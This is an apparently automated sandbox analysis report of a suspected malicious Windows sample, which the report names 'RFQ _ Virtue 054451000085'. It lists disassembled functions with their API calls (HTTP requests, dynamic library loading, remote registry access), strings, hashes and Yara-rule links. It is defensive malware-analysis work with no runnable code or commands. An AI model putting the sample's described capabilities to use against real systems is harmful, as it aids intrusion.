Function 00416192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00416248
_memmove.LIBCMT ref: 004162E4
_memset.LIBCMT ref: 00416308

Strings

ERCP, xrefs: 004161B3
3cA, xrefs: 004162AF

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3cA$ERCP
API String ID: 2532777613-1471582817
Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59

Function 00462753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004627C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B

Strings

0, xrefs: 004627B5

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B

Function 0047D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5

Part of subcall function 0040784B: _memmove.LIBCMT ref: 00407899

Strings

winapi, xrefs: 0047D836
cdecl, xrefs: 0047D81C
stdcall, xrefs: 0047D847
none, xrefs: 0047D8A0

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 85bf6583a6d5216460642c634f58536033cb8f756531c513cb924ba6ba7dc0f0
Instruction ID: 0be9701992b4b91cd2e68042300235638f00ad80fed84879f118ea648425d64e
Opcode Fuzzy Hash: 85bf6583a6d5216460642c634f58536033cb8f756531c513cb924ba6ba7dc0f0
Instruction Fuzzy Hash: 783191719142159BCF00EF55CC919EEB3B4FF14324B108A2BE839A76D2DB39AD05CB95

Function 00458E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Strings

ComboBox, xrefs: 00458E9E
ListBox, xrefs: 00458ED3

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: ddad20509fe9b3e1c31c3b2e57fd2caf3c7aa24dd0e867efcdf563172e2aeebf
Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
Opcode Fuzzy Hash: ddad20509fe9b3e1c31c3b2e57fd2caf3c7aa24dd0e867efcdf563172e2aeebf
Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28

Function 0047182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00471872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004718A2
InternetCloseHandle.WININET(00000000), ref: 004718E9

Part of subcall function 00472483: GetLastError.KERNEL32(?,?,00471817,00000000,00000000,00000001), ref: 00472498
Part of subcall function 00472483: SetEvent.KERNEL32(?,?,00471817,00000000,00000000,00000001), ref: 004724AD

Strings

, xrefs: 00471893

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 6e03d3876d11c1f4078e21f2429e25c28f700f0be32576d9d2588f00842c0ae0
Instruction ID: 9f195ba99928d8c49214c982579914efbee4b11eb605a7749f470a37591c6317
Opcode Fuzzy Hash: 6e03d3876d11c1f4078e21f2429e25c28f700f0be32576d9d2588f00842c0ae0
Instruction Fuzzy Hash: 1021B3B15002087FE711AF65DC85EFF77EDEB48748F10812FF44992250DA688D0957AA

Function 004863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
LoadLibraryW.KERNEL32(?), ref: 00486468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
DestroyWindow.USER32(?), ref: 00486485

Strings

SysAnimate32, xrefs: 0048643C

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768

Function 00466D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
GetStdHandle.KERNEL32(0000000C), ref: 00466E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B

Strings

nul, xrefs: 00466E36

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A

Function 00466E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00466E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06

Strings

nul, xrefs: 00466F01

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A

Function 0046AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0046AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
__swprintf.LIBCMT ref: 0046ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF

Strings

%lu, xrefs: 0046ACBB

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25

Function 00461142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1

Strings

@F, xrefs: 0046119D

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @F
API String ID: 2875609808-2781531706
Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A

Function 0047EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
CloseHandle.KERNEL32(?), ref: 0047EDEB

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49

Function 0042541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042547B
_memcpy_s.LIBCMT ref: 004254ED
__read_nolock.LIBCMT ref: 0042554B
__filbuf.LIBCMT ref: 0042556E
_memset.LIBCMT ref: 004255B2

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49

Function 00480037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
RegCloseKey.ADVAPI32(?,?), ref: 004801AF
RegCloseKey.ADVAPI32(00000000), ref: 004801BC

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56

Function 0047D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047D927
GetProcAddress.KERNEL32(00000000,?), ref: 0047D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 0047D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 0047DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047DA21

Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 06879a4796fb006db6701dcbeb08c84373d42f215ecc0ca78cf9e4c751ad0c13
Instruction ID: 2e87ffb2dc156b6f817890f7ff3d29c7ed6bd27adfaf25e4966d104b6097512d
Opcode Fuzzy Hash: 06879a4796fb006db6701dcbeb08c84373d42f215ecc0ca78cf9e4c751ad0c13
Instruction Fuzzy Hash: C6512A75A00205DFCB00EFA9C4849AEB7B4FF09324B14C06AE959AB352D739AD45CF59

Function 0046E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
